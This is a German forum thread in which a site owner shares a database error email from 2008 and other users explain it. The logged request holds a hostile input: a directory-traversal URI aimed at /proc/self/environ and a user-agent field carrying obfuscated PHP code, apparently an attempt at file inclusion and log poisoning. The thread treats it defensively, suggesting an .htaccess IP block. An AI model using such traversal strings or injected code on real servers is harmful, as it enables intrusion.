Hallo zusammen !
Ich bekam heute morgen folgende Mitteilung per Email von meinem Server:
Database Error Notification

Invalid SQL: INSERT INTO ibf_sessions (id, member_name, member_id, ip_address, browser, running_time, login_type, member_group)
VALUES ('2f0bd41e261d2a2dee221b85dd76c9af', '', 0, '62.26.219.91', '<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\', '1220422838', '0', 2)

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1220422838', '0', 2)' at line 2

Error number: 1064
Date: 'Wednesday 3rd of September 2008 06:20:38 AM
Filename: /index.php
URI (cleaned): /index.php?act=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

Was ich der Meldung entnemhmen "könnte" ist der Hinweis,
das die DB sich mit der MySQL-Version nicht ganz "versteht" ?
Hmm,
was kann ich tun ?
Das CMS läuft aber so ich das bisher gesehen habe ohne Probleme..
Updates sind auf dem Server auch nicht gelaufen,
einzigst habe ich den Skin von "Throw" auf "Somenday" umgestellt,
aber daran kann es eigentlich nicht liegen...
Wer kann evtl etwas dazu sagen ?

Danke schön !

Keiner weiss dazu etwas ?

Hallo, soweit ich verstehe, hast du ein Problem in der "ibf_sessions" Tabelle... die funktioniert nicht so richtig. Versuche Sie anhand von phpMyAdmin zu reparieren oder verbessern...

Versuche Sie anhand von phpMyAdmin zu reparieren oder verbessern...
Haja, nur wie ?
ich bin leider kein MySQL Spzie :D
Trotzdem ein Herzliches Danke schön !!

phpMyAdmin ist ein leicht zu bedienendes Interface für MySQL Datenbanken... per Knopfdruck kannst Du Tabellen damit verwalten...
kommt nur drauf an ob das auf deinem Server installiert hast bzw. ob dein Hoster das drauf hat.

phpMyAdmin ist ein leicht zu bedienendes Interface für MySQL Datenbanken...
Ach, ehrlich ?? :D
"Spass-Modus"
Ich benutze phpmyAdmin lediglich um defekte Tabellen auszutauschen,
alles andere geht per SSH, auch eine Sicherung kann ich dank Tips per SSH machen...
Hmmm nur frag ich mich ob ich die ganze Tabelle mal aus einer bestehenden Sicherung tauschen soll ....
Währe doch mal ne Massnahme, oder ?
Da ich aber nicht weiss, mit welchen Dingen diese Tabelle im Eingriff steht,
bleibt mal wieder das beliebte Restrisiko :P
Danke für Deine Antwort !

Hier ein paar Erläuterungen, dass die Fehlermeldung sogar gut ist:
- die URI zeigt einen Hacking Versuch an
- die Forumtabelle ist nicht das Problem
- durch die Option "Friendly URLs" werden ungültige Links auf Deine Domain und somit auf Subdreamer's index.php umgelenkt
- daher läuft die ungültige URI auf einen SQL Fehler und das Skript bricht ab

Im letzten Punkt liegt das Positive: würde der Fehler nicht auftreten, hättest Du keinen direkten Hinweis auf den Hackingversuch überhaupt und der Skriptabbruch hat den Vorteil dass der schadhafte Code nicht weiter verarbeitet wird.

Das einfachste momentan ist, die entsprechende IP zu blocken durch Anpassung der .htaccess Datei, z.B.:
deny from xxx.xxx.xxx.xxx
Die Zeile kann mehrfache Einträge, durch Leerzeichen getrennt, enthalten.

Danke für den Tip,
auch wenn der unbefriedigend ist,
lasst Euch mal was besseres / effektiveres dazu einfallen. ( bitte )
daher läuft die ungültige URI auf einen SQL Fehler und das Skript bricht ab
na wenigstens ein Vorteil...

Hab mich wieder beruhigt.
Die Fehlermeldung kommt nun nicht mehr.
War ein Paar Tage ausser Hause,
also:
es funktioniert nun wohl !

Danke schön !